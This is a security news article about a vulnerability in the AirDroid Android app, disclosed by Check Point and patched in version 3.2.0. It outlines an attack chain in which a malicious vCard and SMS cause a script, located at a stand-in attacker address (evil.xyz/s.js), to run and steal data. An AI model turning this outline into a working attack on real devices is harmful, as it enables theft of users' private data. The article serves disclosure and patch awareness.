A critical vulnerability impacting 50 million Android users running the popular AirDroid application has been patched. AirDroid, an app that allows you link an Android device to a computer and send SMS messages, run apps and add contacts via a Wi-Fi connected web browser, released the patch Jan. 29.
Check Point security researchers disclosed the AirDroid vulnerability on Thursday, issuing an alert that outlined how attackers could steal data from unsuspecting users. The exploit could be carried out if an attacker sends an SMS message that appears to be a legitimate (vCard) contact. When user saves the contact to their device, that allows an attacker’s malicious payload to exploit a vulnerability in the AirDroid application, according to the Check Point report.
“Once exploited, the app enables the attackers to execute code on the device in order to steal data and send it back to their servers,” wrote Oded Vanunu, security research group manager at Check Point and author of the report, adding that an attacker must obtain a valid session token and use the AirDroid API in an attack.
Calif-based Sand Studio, the publisher of AirDroid, pushed out security patch (version 3.2.0) to its AirDroid three weeks ago. The company did not reply to a request for comment. Check Point advises AirDroid users to update their application immediately.
“All an attacker needs is the phone number associated with the targeted account. Once that phone number is obtained, the attacker needs to share a contact card with the target, and get the target to add it to his or her phone book,” Vanunu wrote.
Once the user receives a text message from that new contact, the malicious code (located at evil.xyz/s.js) is loaded and executed inside the AirDroid web page.
“The main threat is a complete theft of private information – imagine, for example, that just receiving an SMS message can result in all of the user’s data being stolen. Another threat is that an attacker could control the content of the target’s device,” Vanunu wrote. Attackers are able to take complete control over a user’s Android device by achieving a valid session token and use the AirDroid API.
According to Check Point, the vulnerability can also be delivered using any messaging app including WhatsApp and email.
In April, AirDroid patched an authentication flaw that could give attackers remote control over a connected Android device. In 2013, AirDroid patched a vulnerability that allowed hacker to perform DoS attacks from an Android device.